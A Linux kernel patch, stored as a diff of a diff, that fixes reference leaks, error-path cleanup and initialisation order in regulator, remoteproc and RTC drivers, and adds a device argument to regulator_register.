+@@ -1002,7 +1002,7 @@ static int drms_uA_update(struct regulator_dev *rdev)
+ 		/* get input voltage */
+ 		input_uV = 0;
+ 		if (rdev->supply)
+-			input_uV = regulator_get_voltage(rdev->supply);
++			input_uV = regulator_get_voltage_rdev(rdev->supply->rdev);
+ 		if (input_uV <= 0)
+ 			input_uV = rdev->constraints->input_uV;
+ 
+@@ -1596,7 +1596,13 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 		if (rdev->supply_name && !rdev->supply)
+ 			return -EPROBE_DEFER;
+ 
+-		if (rdev->supply) {
++		/* If supplying regulator has already been enabled,
++		 * it's not intended to have use_count increment
++		 * when rdev is only boot-on.
++		 */
++		if (rdev->supply &&
++		    (rdev->constraints->always_on ||
++		     !regulator_is_enabled(rdev->supply))) {
+ 			ret = regulator_enable(rdev->supply);
+ 			if (ret < 0) {
+ 				_regulator_put(rdev->supply);
+@@ -1640,6 +1646,7 @@ static int set_supply(struct regulator_dev *rdev,
+ 
+ 	rdev->supply = create_regulator(supply_rdev, &rdev->dev, "SUPPLY");
+ 	if (rdev->supply == NULL) {
++		module_put(supply_rdev->owner);
+ 		err = -ENOMEM;
+ 		return err;
+ 	}
+@@ -1813,7 +1820,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 
+ 	regulator = kzalloc(sizeof(*regulator), GFP_KERNEL);
+ 	if (regulator == NULL) {
+-		kfree(supply_name);
++		kfree_const(supply_name);
+ 		return NULL;
+ 	}
+ 
+@@ -1943,6 +1950,7 @@ static struct regulator_dev *regulator_dev_lookup(struct device *dev,
+ 		node = of_get_regulator(dev, supply);
+ 		if (node) {
+ 			r = of_find_regulator_by_node(node);
++			of_node_put(node);
+ 			if (r)
+ 				return r;
+ 
+@@ -5396,6 +5404,7 @@ static struct regulator_coupler generic_regulator_coupler = {
+ 
+ /**
+  * regulator_register - register regulator
++ * @dev: the device that drive the regulator
+  * @regulator_desc: regulator to register
+  * @cfg: runtime configuration for regulator
+  *
+@@ -5404,7 +5413,8 @@ static struct regulator_coupler generic_regulator_coupler = {
+  * or an ERR_PTR() on error.
+  */
+ struct regulator_dev *
+-regulator_register(const struct regulator_desc *regulator_desc,
++regulator_register(struct device *dev,
++		   const struct regulator_desc *regulator_desc,
+ 		   const struct regulator_config *cfg)
+ {
+ 	const struct regulator_init_data *init_data;
+@@ -5413,7 +5423,6 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 	struct regulator_dev *rdev;
+ 	bool dangling_cfg_gpiod = false;
+ 	bool dangling_of_gpiod = false;
+-	struct device *dev;
+ 	int ret, i;
+ 	bool resolved_early = false;
+ 
+@@ -5426,8 +5435,7 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 		goto rinse;
+ 	}
+ 
+-	dev = cfg->dev;
+-	WARN_ON(!dev);
++	WARN_ON(!dev || !cfg->dev);
+ 
+ 	if (regulator_desc->name == NULL || regulator_desc->ops == NULL) {
+ 		ret = -EINVAL;
+@@ -5526,7 +5534,7 @@ regulator_register(const struct regulator_desc *regulator_desc,
+ 
+ 	/* register with sysfs */
+ 	rdev->dev.class = &regulator_class;
+-	rdev->dev.parent = dev;
++	rdev->dev.parent = config->dev;
+ 	dev_set_name(&rdev->dev, "regulator.%lu",
+ 		    (unsigned long) atomic_inc_return(&regulator_no));
+ 	dev_set_drvdata(&rdev->dev, rdev);
+@@ -5641,6 +5649,7 @@ unset_supplies:
+ 	regulator_remove_coupling(rdev);
+ 	mutex_unlock(&regulator_list_mutex);
+ wash:
++	regulator_put(rdev->supply);
+ 	kfree(rdev->coupling_desc.coupled_rdevs);
+ 	mutex_lock(&regulator_list_mutex);
+ 	regulator_ena_gpio_free(rdev);
+diff --git a/drivers/regulator/devres.c b/drivers/regulator/devres.c
+index 3265e75e97ab4..5c7ff9b3e8a79 100644
+--- a/drivers/regulator/devres.c
++++ b/drivers/regulator/devres.c
+@@ -385,7 +385,7 @@ struct regulator_dev *devm_regulator_register(struct device *dev,
+ 	if (!ptr)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	rdev = regulator_register(regulator_desc, config);
++	rdev = regulator_register(dev, regulator_desc, config);
+ 	if (!IS_ERR(rdev)) {
+ 		*ptr = rdev;
+ 		devres_add(dev, ptr);
+diff --git a/drivers/regulator/of_regulator.c b/drivers/regulator/of_regulator.c
+index 0aff1c2886b5d..cd726d4e8fbfb 100644
+--- a/drivers/regulator/of_regulator.c
++++ b/drivers/regulator/of_regulator.c
+@@ -505,7 +505,7 @@ struct regulator_init_data *regulator_of_get_init_data(struct device *dev,
+ 	struct device_node *child;
+ 	struct regulator_init_data *init_data = NULL;
+ 
+-	child = regulator_of_get_init_node(dev, desc);
++	child = regulator_of_get_init_node(config->dev, desc);
+ 	if (!child)
+ 		return NULL;
+ 
+diff --git a/drivers/regulator/qcom-labibb-regulator.c b/drivers/regulator/qcom-labibb-regulator.c
+index 639b71eb41ffe..bcf7140f3bc98 100644
+--- a/drivers/regulator/qcom-labibb-regulator.c
++++ b/drivers/regulator/qcom-labibb-regulator.c
+@@ -822,6 +822,7 @@ static int qcom_labibb_regulator_probe(struct platform_device *pdev)
+ 			if (irq == 0)
+ 				irq = -EINVAL;
+ 
++			of_node_put(reg_node);
+ 			return dev_err_probe(vreg->dev, irq,
+ 					     "Short-circuit irq not found.\n");
+ 		}
+diff --git a/drivers/regulator/qcom-rpmh-regulator.c b/drivers/regulator/qcom-rpmh-regulator.c
+index 4158ff126a67a..f90bcdeecea58 100644
+--- a/drivers/regulator/qcom-rpmh-regulator.c
++++ b/drivers/regulator/qcom-rpmh-regulator.c
+@@ -1187,7 +1187,7 @@ static const struct rpmh_vreg_init_data pm7325_vreg_data[] = {
+ static const struct rpmh_vreg_init_data pmr735a_vreg_data[] = {
+ 	RPMH_VREG("smps1",  "smp%s1",  &pmic5_ftsmps520, "vdd-s1"),
+ 	RPMH_VREG("smps2",  "smp%s2",  &pmic5_ftsmps520, "vdd-s2"),
+-	RPMH_VREG("smps3",  "smp%s3",  &pmic5_hfsmps510, "vdd-s3"),
++	RPMH_VREG("smps3",  "smp%s3",  &pmic5_hfsmps515, "vdd-s3"),
+ 	RPMH_VREG("ldo1",   "ldo%s1",  &pmic5_nldo,      "vdd-l1-l2"),
+ 	RPMH_VREG("ldo2",   "ldo%s2",  &pmic5_nldo,      "vdd-l1-l2"),
+ 	RPMH_VREG("ldo3",   "ldo%s3",  &pmic5_nldo,      "vdd-l3"),
+diff --git a/drivers/regulator/stm32-vrefbuf.c b/drivers/regulator/stm32-vrefbuf.c
+index 30ea3bc8ca192..7a454b7b6eab9 100644
+--- a/drivers/regulator/stm32-vrefbuf.c
++++ b/drivers/regulator/stm32-vrefbuf.c
+@@ -210,7 +210,7 @@ static int stm32_vrefbuf_probe(struct platform_device *pdev)
+ 						      pdev->dev.of_node,
+ 						      &stm32_vrefbuf_regu);
+ 
+-	rdev = regulator_register(&stm32_vrefbuf_regu, &config);
++	rdev = regulator_register(&pdev->dev, &stm32_vrefbuf_regu, &config);
+ 	if (IS_ERR(rdev)) {
+ 		ret = PTR_ERR(rdev);
+ 		dev_err(&pdev->dev, "register failed with error %d\n", ret);
+diff --git a/drivers/remoteproc/qcom_q6v5_pas.c b/drivers/remoteproc/qcom_q6v5_pas.c
+index 6afd0941e5524..dc6f07ca83410 100644
+--- a/drivers/remoteproc/qcom_q6v5_pas.c
++++ b/drivers/remoteproc/qcom_q6v5_pas.c
+@@ -449,6 +449,7 @@ static int adsp_alloc_memory_region(struct qcom_adsp *adsp)
+ 	}
+ 
+ 	ret = of_address_to_resource(node, 0, &r);
++	of_node_put(node);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -556,6 +557,7 @@ static int adsp_probe(struct platform_device *pdev)
+ detach_proxy_pds:
+ 	adsp_pds_detach(adsp, adsp->proxy_pds, adsp->proxy_pd_count);
+ free_rproc:
++	device_init_wakeup(adsp->dev, false);
+ 	rproc_free(rproc);
+ 
+ 	return ret;
+@@ -572,6 +574,8 @@ static int adsp_remove(struct platform_device *pdev)
+ 	qcom_remove_sysmon_subdev(adsp->sysmon);
+ 	qcom_remove_smd_subdev(adsp->rproc, &adsp->smd_subdev);
+ 	qcom_remove_ssr_subdev(adsp->rproc, &adsp->ssr_subdev);
++	adsp_pds_detach(adsp, adsp->proxy_pds, adsp->proxy_pd_count);
++	device_init_wakeup(adsp->dev, false);
+ 	rproc_free(adsp->rproc);
+ 
+ 	return 0;
+diff --git a/drivers/remoteproc/qcom_q6v5_wcss.c b/drivers/remoteproc/qcom_q6v5_wcss.c
+index bb0947f7770ea..ba24d745b2d65 100644
+--- a/drivers/remoteproc/qcom_q6v5_wcss.c
++++ b/drivers/remoteproc/qcom_q6v5_wcss.c
+@@ -351,7 +351,7 @@ static int q6v5_wcss_qcs404_power_on(struct q6v5_wcss *wcss)
+ 	if (ret) {
+ 		dev_err(wcss->dev,
+ 			"xo cbcr enabling timed out (rc:%d)\n", ret);
+-		return ret;
++		goto disable_xo_cbcr_clk;
+ 	}
+ 
+ 	writel(0, wcss->reg_base + Q6SS_CGC_OVERRIDE);
+@@ -417,6 +417,7 @@ disable_sleep_cbcr_clk:
+ 	val = readl(wcss->reg_base + Q6SS_SLEEP_CBCR);
+ 	val &= ~Q6SS_CLK_ENABLE;
+ 	writel(val, wcss->reg_base + Q6SS_SLEEP_CBCR);
++disable_xo_cbcr_clk:
+ 	val = readl(wcss->reg_base + Q6SS_XO_CBCR);
+ 	val &= ~Q6SS_CLK_ENABLE;
+ 	writel(val, wcss->reg_base + Q6SS_XO_CBCR);
+@@ -827,6 +828,9 @@ static int q6v5_wcss_init_mmio(struct q6v5_wcss *wcss,
+ 	int ret;
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "qdsp6");
++	if (!res)
++		return -EINVAL;
++
+ 	wcss->reg_base = devm_ioremap(&pdev->dev, res->start,
+ 				      resource_size(res));
+ 	if (!wcss->reg_base)
+diff --git a/drivers/remoteproc/qcom_sysmon.c b/drivers/remoteproc/qcom_sysmon.c
+index 57dde2a69b9dd..15af52f8499eb 100644
+--- a/drivers/remoteproc/qcom_sysmon.c
++++ b/drivers/remoteproc/qcom_sysmon.c
+@@ -652,7 +652,9 @@ struct qcom_sysmon *qcom_add_sysmon_subdev(struct rproc *rproc,
+ 		if (sysmon->shutdown_irq != -ENODATA) {
+ 			dev_err(sysmon->dev,
+ 				"failed to retrieve shutdown-ack IRQ\n");
+-			return ERR_PTR(sysmon->shutdown_irq);
++			ret = sysmon->shutdown_irq;
++			kfree(sysmon);
++			return ERR_PTR(ret);
+ 		}
+ 	} else {
+ 		ret = devm_request_threaded_irq(sysmon->dev,
+@@ -663,6 +665,7 @@ struct qcom_sysmon *qcom_add_sysmon_subdev(struct rproc *rproc,
+ 		if (ret) {
+ 			dev_err(sysmon->dev,
+ 				"failed to acquire shutdown-ack IRQ\n");
++			kfree(sysmon);
+ 			return ERR_PTR(ret);
+ 		}
+ 	}
+diff --git a/drivers/remoteproc/remoteproc_core.c b/drivers/remoteproc/remoteproc_core.c
+index 8768cb64f560c..cb1d414a23896 100644
+--- a/drivers/remoteproc/remoteproc_core.c
++++ b/drivers/remoteproc/remoteproc_core.c
+@@ -509,7 +509,13 @@ static int rproc_handle_vdev(struct rproc *rproc, void *ptr,
+ 	rvdev_data.rsc_offset = offset;
+ 	rvdev_data.rsc = rsc;
+ 
+-	pdev = platform_device_register_data(dev, "rproc-virtio", rvdev_data.index, &rvdev_data,
++	/*
++	 * When there is more than one remote processor, rproc->nb_vdev number is
++	 * same for each separate instances of "rproc". If rvdev_data.index is used
++	 * as device id, then we get duplication in sysfs, so need to use
++	 * PLATFORM_DEVID_AUTO to auto select device id.
++	 */
++	pdev = platform_device_register_data(dev, "rproc-virtio", PLATFORM_DEVID_AUTO, &rvdev_data,
+ 					     sizeof(rvdev_data));
+ 	if (IS_ERR(pdev)) {
+ 		dev_err(dev, "failed to create rproc-virtio device\n");
+diff --git a/drivers/rtc/class.c b/drivers/rtc/class.c
+index e48223c00c672..e5b7b48cffac0 100644
+--- a/drivers/rtc/class.c
++++ b/drivers/rtc/class.c
+@@ -374,11 +374,11 @@ struct rtc_device *devm_rtc_allocate_device(struct device *dev)
+ 
+ 	rtc->id = id;
+ 	rtc->dev.parent = dev;
+-	err = dev_set_name(&rtc->dev, "rtc%d", id);
++	err = devm_add_action_or_reset(dev, devm_rtc_release_device, rtc);
+ 	if (err)
+ 		return ERR_PTR(err);
+ 
+-	err = devm_add_action_or_reset(dev, devm_rtc_release_device, rtc);
++	err = dev_set_name(&rtc->dev, "rtc%d", id);
+ 	if (err)
+ 		return ERR_PTR(err);
+ 
+diff --git a/drivers/rtc/rtc-cmos.c b/drivers/rtc/rtc-cmos.c
+index 58cc2bae2f8a0..00e2ca7374ecf 100644
+--- a/drivers/rtc/rtc-cmos.c
++++ b/drivers/rtc/rtc-cmos.c
+@@ -744,6 +744,168 @@ static irqreturn_t cmos_interrupt(int irq, void *p)
+ 		return IRQ_NONE;
+ }
+ 
++#ifdef	CONFIG_ACPI
++
++#include <linux/acpi.h>
++
++static u32 rtc_handler(void *context)
++{
++	struct device *dev = context;
++	struct cmos_rtc *cmos = dev_get_drvdata(dev);
++	unsigned char rtc_control = 0;
++	unsigned char rtc_intr;
++	unsigned long flags;
++
++
++	/*
++	 * Always update rtc irq when ACPI is used as RTC Alarm.
++	 * Or else, ACPI SCI is enabled during suspend/resume only,
++	 * update rtc irq in that case.
++	 */
++	if (cmos_use_acpi_alarm())
++		cmos_interrupt(0, (void *)cmos->rtc);
++	else {
++		/* Fix me: can we use cmos_interrupt() here as well? */
++		spin_lock_irqsave(&rtc_lock, flags);
++		if (cmos_rtc.suspend_ctrl)
++			rtc_control = CMOS_READ(RTC_CONTROL);
++		if (rtc_control & RTC_AIE) {
++			cmos_rtc.suspend_ctrl &= ~RTC_AIE;
++			CMOS_WRITE(rtc_control, RTC_CONTROL);
++			rtc_intr = CMOS_READ(RTC_INTR_FLAGS);
++			rtc_update_irq(cmos->rtc, 1, rtc_intr);
++		}
++		spin_unlock_irqrestore(&rtc_lock, flags);
++	}
++
++	pm_wakeup_hard_event(dev);
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++	return ACPI_INTERRUPT_HANDLED;
++}
++
++static void acpi_rtc_event_setup(struct device *dev)
++{
++	if (acpi_disabled)
++		return;
++
++	acpi_install_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler, dev);
++	/*
++	 * After the RTC handler is installed, the Fixed_RTC event should
++	 * be disabled. Only when the RTC alarm is set will it be enabled.
++	 */
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++}
++
++static void acpi_rtc_event_cleanup(void)
++{
++	if (acpi_disabled)
++		return;
++
++	acpi_remove_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler);
++}
++
++static void rtc_wake_on(struct device *dev)
++{
++	acpi_clear_event(ACPI_EVENT_RTC);
++	acpi_enable_event(ACPI_EVENT_RTC, 0);
++}
++
++static void rtc_wake_off(struct device *dev)
++{
++	acpi_disable_event(ACPI_EVENT_RTC, 0);
++}
++
++#ifdef CONFIG_X86
++/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
++static void use_acpi_alarm_quirks(void)
++{
++	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
++		return;
++
++	if (!is_hpet_enabled())
++		return;
++
++	if (dmi_get_bios_year() < 2015)
++		return;
++
++	use_acpi_alarm = true;
++}
++#else
++static inline void use_acpi_alarm_quirks(void) { }
++#endif
++
++static void acpi_cmos_wake_setup(struct device *dev)
++{
++	if (acpi_disabled)
++		return;
++
++	use_acpi_alarm_quirks();
++
++	cmos_rtc.wake_on = rtc_wake_on;
++	cmos_rtc.wake_off = rtc_wake_off;
++
++	/* ACPI tables bug workaround. */
++	if (acpi_gbl_FADT.month_alarm && !acpi_gbl_FADT.day_alarm) {
++		dev_dbg(dev, "bogus FADT month_alarm (%d)\n",
++			acpi_gbl_FADT.month_alarm);
++		acpi_gbl_FADT.month_alarm = 0;
++	}
++
++	cmos_rtc.day_alrm = acpi_gbl_FADT.day_alarm;
++	cmos_rtc.mon_alrm = acpi_gbl_FADT.month_alarm;
++	cmos_rtc.century = acpi_gbl_FADT.century;
++
++	if (acpi_gbl_FADT.flags & ACPI_FADT_S4_RTC_WAKE)
++		dev_info(dev, "RTC can wake from S4\n");
++
++	/* RTC always wakes from S1/S2/S3, and often S4/STD */
++	device_init_wakeup(dev, 1);
++}
++
++static void cmos_check_acpi_rtc_status(struct device *dev,
++					      unsigned char *rtc_control)
++{
++	struct cmos_rtc *cmos = dev_get_drvdata(dev);
++	acpi_event_status rtc_status;
++	acpi_status status;
++
++	if (acpi_gbl_FADT.flags & ACPI_FADT_FIXED_RTC)
++		return;
++
++	status = acpi_get_event_status(ACPI_EVENT_RTC, &rtc_status);
++	if (ACPI_FAILURE(status)) {
++		dev_err(dev, "Could not get RTC status\n");
++	} else if (rtc_status & ACPI_EVENT_FLAG_SET) {
++		unsigned char mask;
++		*rtc_control &= ~RTC_AIE;
++		CMOS_WRITE(*rtc_control, RTC_CONTROL);
++		mask = CMOS_READ(RTC_INTR_FLAGS);
++		rtc_update_irq(cmos->rtc, 1, mask);
++	}
++}
++
++#else /* !CONFIG_ACPI */
++
++static inline void acpi_rtc_event_setup(struct device *dev)
++{
++}
++
++static inline void acpi_rtc_event_cleanup(void)
++{
++}
++
++static inline void acpi_cmos_wake_setup(struct device *dev)
++{
++}
++
++static inline void cmos_check_acpi_rtc_status(struct device *dev,
++					      unsigned char *rtc_control)
++{
++}
++#endif /* CONFIG_ACPI */
++
+ #ifdef	CONFIG_PNP
+ #define	INITSECTION
+ 
+@@ -827,19 +989,27 @@ cmos_do_probe(struct device *dev, struct resource *ports, int rtc_irq)
+ 		if (info->address_space)
+ 			address_space = info->address_space;
+ 
+-		if (info->rtc_day_alarm && info->rtc_day_alarm < 128)
+-			cmos_rtc.day_alrm = info->rtc_day_alarm;
+-		if (info->rtc_mon_alarm && info->rtc_mon_alarm < 128)
+-			cmos_rtc.mon_alrm = info->rtc_mon_alarm;
+-		if (info->rtc_century && info->rtc_century < 128)
+-			cmos_rtc.century = info->rtc_century;
++		cmos_rtc.day_alrm = info->rtc_day_alarm;
++		cmos_rtc.mon_alrm = info->rtc_mon_alarm;
++		cmos_rtc.century = info->rtc_century;
+ 
+ 		if (info->wake_on && info->wake_off) {
+ 			cmos_rtc.wake_on = info->wake_on;
+ 			cmos_rtc.wake_off = info->wake_off;
+ 		}
++	} else {
++		acpi_cmos_wake_setup(dev);
+ 	}
+ 
++	if (cmos_rtc.day_alrm >= 128)
++		cmos_rtc.day_alrm = 0;
++
++	if (cmos_rtc.mon_alrm >= 128)
++		cmos_rtc.mon_alrm = 0;
++
++	if (cmos_rtc.century >= 128)
++		cmos_rtc.century = 0;
++
+ 	cmos_rtc.dev = dev;
+ 	dev_set_drvdata(dev, &cmos_rtc);
+ 
+@@ -928,6 +1098,13 @@ cmos_do_probe(struct device *dev, struct resource *ports, int rtc_irq)
+ 	nvmem_cfg.size = address_space - NVRAM_OFFSET;
+ 	devm_rtc_nvmem_register(cmos_rtc.rtc, &nvmem_cfg);
+ 
++	/*
++	 * Everything has gone well so far, so by default register a handler for
++	 * the ACPI RTC fixed event.
++	 */
++	if (!info)
++		acpi_rtc_event_setup(dev);
++
+ 	dev_info(dev, "%s%s, %d bytes nvram%s\n",
+ 		 !is_valid_irq(rtc_irq) ? "no alarms" :
+ 		 cmos_rtc.mon_alrm ? "alarms up to one year" :
+@@ -973,6 +1150,9 @@ static void cmos_do_remove(struct device *dev)
+ 			hpet_unregister_irq_handler(cmos_interrupt);
+ 	}
+ 
++	if (!dev_get_platdata(dev))
++		acpi_rtc_event_cleanup();
++
+ 	cmos->rtc = NULL;
+ 
+ 	ports = cmos->iomem;
+@@ -1122,9 +1302,6 @@ static void cmos_check_wkalrm(struct device *dev)
+ 	}
+ }
+ 
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control);
+-
+ static int __maybe_unused cmos_resume(struct device *dev)
+ {
+ 	struct cmos_rtc	*cmos = dev_get_drvdata(dev);
+@@ -1191,175 +1368,13 @@ static SIMPLE_DEV_PM_OPS(cmos_pm_ops, cmos_suspend, cmos_resume);
+  * predate even PNPBIOS should set up platform_bus devices.
+  */
+ 
+-#ifdef	CONFIG_ACPI
+-
+-#include <linux/acpi.h>
+-
+-static u32 rtc_handler(void *context)
+-{
+-	struct device *dev = context;
+-	struct cmos_rtc *cmos = dev_get_drvdata(dev);
+-	unsigned char rtc_control = 0;
+-	unsigned char rtc_intr;
+-	unsigned long flags;
+-
+-
+-	/*
+-	 * Always update rtc irq when ACPI is used as RTC Alarm.
+-	 * Or else, ACPI SCI is enabled during suspend/resume only,
+-	 * update rtc irq in that case.
+-	 */
+-	if (cmos_use_acpi_alarm())
+-		cmos_interrupt(0, (void *)cmos->rtc);
+-	else {
+-		/* Fix me: can we use cmos_interrupt() here as well? */
+-		spin_lock_irqsave(&rtc_lock, flags);
+-		if (cmos_rtc.suspend_ctrl)
+-			rtc_control = CMOS_READ(RTC_CONTROL);
+-		if (rtc_control & RTC_AIE) {
+-			cmos_rtc.suspend_ctrl &= ~RTC_AIE;
+-			CMOS_WRITE(rtc_control, RTC_CONTROL);
+-			rtc_intr = CMOS_READ(RTC_INTR_FLAGS);
+-			rtc_update_irq(cmos->rtc, 1, rtc_intr);
+-		}
+-		spin_unlock_irqrestore(&rtc_lock, flags);
+-	}
+-
+-	pm_wakeup_hard_event(dev);
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-	return ACPI_INTERRUPT_HANDLED;
+-}
+-
+-static inline void rtc_wake_setup(struct device *dev)
+-{
+-	if (acpi_disabled)
+-		return;
+-
+-	acpi_install_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler, dev);
+-	/*
+-	 * After the RTC handler is installed, the Fixed_RTC event should
+-	 * be disabled. Only when the RTC alarm is set will it be enabled.
+-	 */
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-static void rtc_wake_on(struct device *dev)
+-{
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_enable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-static void rtc_wake_off(struct device *dev)
+-{
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-#ifdef CONFIG_X86
+-/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
+-static void use_acpi_alarm_quirks(void)
+-{
+-	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
+-		return;
+-
+-	if (!is_hpet_enabled())
+-		return;
+-
+-	if (dmi_get_bios_year() < 2015)
+-		return;
+-
+-	use_acpi_alarm = true;
+-}
+-#else
+-static inline void use_acpi_alarm_quirks(void) { }
+-#endif
+-
+-/* Every ACPI platform has a mc146818 compatible "cmos rtc".  Here we find
+- * its device node and pass extra config data.  This helps its driver use
+- * capabilities that the now-obsolete mc146818 didn't have, and informs it
+- * that this board's RTC is wakeup-capable (per ACPI spec).
+- */
+-static struct cmos_rtc_board_info acpi_rtc_info;
+-
+-static void cmos_wake_setup(struct device *dev)
+-{
+-	if (acpi_disabled)
+-		return;
+-
+-	use_acpi_alarm_quirks();
+-
+-	acpi_rtc_info.wake_on = rtc_wake_on;
+-	acpi_rtc_info.wake_off = rtc_wake_off;
+-
+-	/* workaround bug in some ACPI tables */
+-	if (acpi_gbl_FADT.month_alarm && !acpi_gbl_FADT.day_alarm) {
+-		dev_dbg(dev, "bogus FADT month_alarm (%d)\n",
+-			acpi_gbl_FADT.month_alarm);
+-		acpi_gbl_FADT.month_alarm = 0;
+-	}
+-
+-	acpi_rtc_info.rtc_day_alarm = acpi_gbl_FADT.day_alarm;
+-	acpi_rtc_info.rtc_mon_alarm = acpi_gbl_FADT.month_alarm;
+-	acpi_rtc_info.rtc_century = acpi_gbl_FADT.century;
+-
+-	/* NOTE:  S4_RTC_WAKE is NOT currently useful to Linux */
+-	if (acpi_gbl_FADT.flags & ACPI_FADT_S4_RTC_WAKE)
+-		dev_info(dev, "RTC can wake from S4\n");
+-
+-	dev->platform_data = &acpi_rtc_info;
+-
+-	/* RTC always wakes from S1/S2/S3, and often S4/STD */
+-	device_init_wakeup(dev, 1);
+-}
+-
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control)
+-{
+-	struct cmos_rtc *cmos = dev_get_drvdata(dev);
+-	acpi_event_status rtc_status;
+-	acpi_status status;
+-
+-	if (acpi_gbl_FADT.flags & ACPI_FADT_FIXED_RTC)
+-		return;
+-
+-	status = acpi_get_event_status(ACPI_EVENT_RTC, &rtc_status);
+-	if (ACPI_FAILURE(status)) {
+-		dev_err(dev, "Could not get RTC status\n");
+-	} else if (rtc_status & ACPI_EVENT_FLAG_SET) {
+-		unsigned char mask;
+-		*rtc_control &= ~RTC_AIE;
+-		CMOS_WRITE(*rtc_control, RTC_CONTROL);
+-		mask = CMOS_READ(RTC_INTR_FLAGS);
+-		rtc_update_irq(cmos->rtc, 1, mask);
+-	}
+-}
+-
+-#else
+-
+-static void cmos_wake_setup(struct device *dev)
+-{
+-}
+-
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control)
+-{
+-}
+-
+-static void rtc_wake_setup(struct device *dev)
+-{
+-}
+-#endif
+-
+ #ifdef	CONFIG_PNP
+ 
+ #include <linux/pnp.h>
+ 
+ static int cmos_pnp_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ {
+-	int irq, ret;
+-
+-	cmos_wake_setup(&pnp->dev);
++	int irq;
+ 
+ 	if (pnp_port_start(pnp, 0) == 0x70 && !pnp_irq_valid(pnp, 0)) {
+ 		irq = 0;
+@@ -1375,13 +1390,7 @@ static int cmos_pnp_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ 		irq = pnp_irq(pnp, 0);
+ 	}
+ 
+-	ret = cmos_do_probe(&pnp->dev, pnp_get_resource(pnp, IORESOURCE_IO, 0), irq);
+-	if (ret)
+-		return ret;
+-
+-	rtc_wake_setup(&pnp->dev);
+-
+-	return 0;
++	return cmos_do_probe(&pnp->dev, pnp_get_resource(pnp, IORESOURCE_IO, 0), irq);
+ }
+ 
+ static void cmos_pnp_remove(struct pnp_dev *pnp)
+@@ -1465,10 +1474,9 @@ static inline void cmos_of_init(struct platform_device *pdev) {}
+ static int __init cmos_platform_probe(struct platform_device *pdev)
+ {
+ 	struct resource *resource;
+-	int irq, ret;
++	int irq;
+ 
+ 	cmos_of_init(pdev);
+-	cmos_wake_setup(&pdev->dev);
+ 
+ 	if (RTC_IOMAPPED)
+ 		resource = platform_get_resource(pdev, IORESOURCE_IO, 0);
+@@ -1478,13 +1486,7 @@ static int __init cmos_platform_probe(struct platform_device *pdev)
+ 	if (irq < 0)
+ 		irq = -1;
+ 
+-	ret = cmos_do_probe(&pdev->dev, resource, irq);
+-	if (ret)
+-		return ret;
+-
+-	rtc_wake_setup(&pdev->dev);
+-
+-	return 0;
++	return cmos_do_probe(&pdev->dev, resource, irq);
+ }
+ 
+ static int cmos_platform_remove(struct platform_device *pdev)
+diff --git a/drivers/rtc/rtc-mxc_v2.c b/drivers/rtc/rtc-mxc_v2.c
+index 5e03834016294..f6d2ad91ff7a9 100644
+--- a/drivers/rtc/rtc-mxc_v2.c
++++ b/drivers/rtc/rtc-mxc_v2.c
+@@ -336,8 +336,10 @@ static int mxc_rtc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
+-	if (IS_ERR(pdata->rtc))
++	if (IS_ERR(pdata->rtc)) {
++		clk_disable_unprepare(pdata->clk);
+ 		return PTR_ERR(pdata->rtc);
++	}
+ 
+ 	pdata->rtc->ops = &mxc_rtc_ops;
+ 	pdata->rtc->range_max = U32_MAX;
+diff --git a/drivers/rtc/rtc-pcf2127.c b/drivers/rtc/rtc-pcf2127.c
+index 63b275b014bd6..87f4fc9df68b4 100644
+--- a/drivers/rtc/rtc-pcf2127.c
++++ b/drivers/rtc/rtc-pcf2127.c
+@@ -885,9 +885,17 @@ static const struct regmap_bus pcf2127_i2c_regmap = {
+ 
+ static struct i2c_driver pcf2127_i2c_driver;
+ 
+-static int pcf2127_i2c_probe(struct i2c_client *client,
+-				const struct i2c_device_id *id)
++static const struct i2c_device_id pcf2127_i2c_id[] = {
++	{ "pcf2127", 1 },
++	{ "pcf2129", 0 },
++	{ "pca2129", 0 },
++	{ }
++};
++MODULE_DEVICE_TABLE(i2c, pcf2127_i2c_id);
++
++static int pcf2127_i2c_probe(struct i2c_client *client)
+ {
++	const struct i2c_device_id *id = i2c_match_id(pcf2127_i2c_id, client);
+ 	struct regmap *regmap;
+ 	static const struct regmap_config config = {
+ 		.reg_bits = 8,
+@@ -910,20 +918,12 @@ static int pcf2127_i2c_probe(struct i2c_client *client,
+ 			     pcf2127_i2c_driver.driver.name, id->driver_data);
+ }
+ 
+-static const struct i2c_device_id pcf2127_i2c_id[] = {
+-	{ "pcf2127", 1 },
+-	{ "pcf2129", 0 },
+-	{ "pca2129", 0 },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(i2c, pcf2127_i2c_id);
+-
+ static struct i2c_driver pcf2127_i2c_driver = {
+ 	.driver		= {
+ 		.name	= "rtc-pcf2127-i2c",
